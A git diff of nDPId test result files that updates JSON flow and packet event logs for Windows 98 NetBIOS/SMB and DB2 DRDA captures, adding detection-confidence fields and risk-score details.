+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00415{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"ts_msec":1576409811132,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77}
 00415{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"ts_msec":1576409811517,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
@@ -141,7 +141,7 @@
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1576409861597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"ts_msec":1576409861597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADNJgAAAIARs03AqO+BwKjv\/wCKAIoAuRxEEQIAEMCo74EAigCjAAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
 00532{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"ts_msec":1576409862195,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQRg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBBABUEVaoA"}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166}
-00624{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409866206,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409866206,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00500{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"ts_msec":1576409866206,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142}
 00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":97,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"ts_msec":1576409868734,"pkt":"AFBWM3ieAAwp1HmyAEvw8AoIDgD\/7xYEAAAAAAQAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAAIUAAgAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="}
@@ -216,7 +216,7 @@
 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":133,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4}
 00517{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"ts_msec":1576409886201,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAAAAAAAAAAAAAAABNREpSOTgA"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1576409797553,"flow_last_seen":1576409799059,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":544,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409888477,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1576409797553,"flow_last_seen":1576409799059,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":544,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409888477,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00517{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"ts_msec":1576409888477,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAFQQBfIgBAAAAAABNREpSOTgA"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":135,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154}
 00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":136,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1576409888973,"pkt":"AFBWM3ieAAwp1HmyABLw8CogDgD\/7x8AAAAAAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
@@ -247,8 +247,8 @@
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":153,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142}
 00533{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"ts_msec":1576409897781,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwXA1AEATURKUjk4AAAAAAAAAAAAAAQAAyBFABUEVaoA"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":155,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1576409800543,"flow_last_seen":1576409805843,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409898877,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00715{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1576409807597,"flow_last_seen":1576409896749,"flow_idle_time":180000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":2055,"flow_avg_l4_payload_len":186,"midstream":0,"ts_msec":1576409898877,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1576409800543,"flow_last_seen":1576409805843,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409898877,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00822{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1576409807597,"flow_last_seen":1576409896749,"flow_idle_time":180000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":2055,"flow_avg_l4_payload_len":186,"midstream":0,"ts_msec":1576409898877,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00391{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":60,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"ts_msec":1576409898877,"pkt":"AFBWM3ieAAwp1HmyADzw8CwgDgD\/7xYEAAAAABAAFQP\/U01CAAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAHAARcVEVTVAA="}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":156,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":60}
 00383{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":157,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"ts_msec":1576409898877,"pkt":"AAwp1HmyAFBWM3ieADXw8CAuDgD\/7xYMAAAQACgAAxX\/U01CAAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAABAgAAAA=="}
@@ -331,16 +331,16 @@
 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":208,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3}
 00541{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":172,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"ts_msec":1576409912777,"pkt":"AwAAAAABAFBWM3ieAKzw8AMsAP\/vCAAAAAAAAAABAl9fTVNCUk9XU0VfXwIBTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAJwAAAAAAAAAAAAAAAAAAAAAAAAAnAFYAAwABAAEAAgA4AFxNQUlMU0xPVFxCUk9XU0UADADA1AEAV09SS0dST1VQAAAAAAAAAAQAACBAgAAAAABNREpSOTgA"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":172}
-00623{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":210,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409923353,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":210,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409923353,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"ts_msec":1576409925058,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAdTUFSVElOIFJPU0VOQVUgAw=="}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
 00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"ts_msec":1576409925661,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAeTUFSVElOIFJPU0VOQVUgAw=="}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
 00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"ts_msec":1576409926307,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQAAAAAAAAAAAAAAAAAAAAAATUFSVElOIFJPU0VOQVUgAw=="}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":180000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":180000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","total-events-serialized":344}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 220/62
@@ -350,9 +350,9 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600227 bytes
-~~ total memory freed........: 4600227 bytes
-~~ total allocations/frees...: 99624/99624
+~~ total memory allocated....: 4684196 bytes
+~~ total memory freed........: 4684196 bytes
+~~ total allocations/frees...: 101214/101214
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 177 chars
 ~~ json string max len.......: 1910 chars
diff --git a/test/results/drda_db2.pcap.out b/test/results/drda_db2.pcap.out
index fa1cc27e6..5e7612673 100644
--- a/test/results/drda_db2.pcap.out
+++ b/test/results/drda_db2.pcap.out
@@ -3,8 +3,8 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"DRDA","breed":"Acceptable","category":"Database"}}
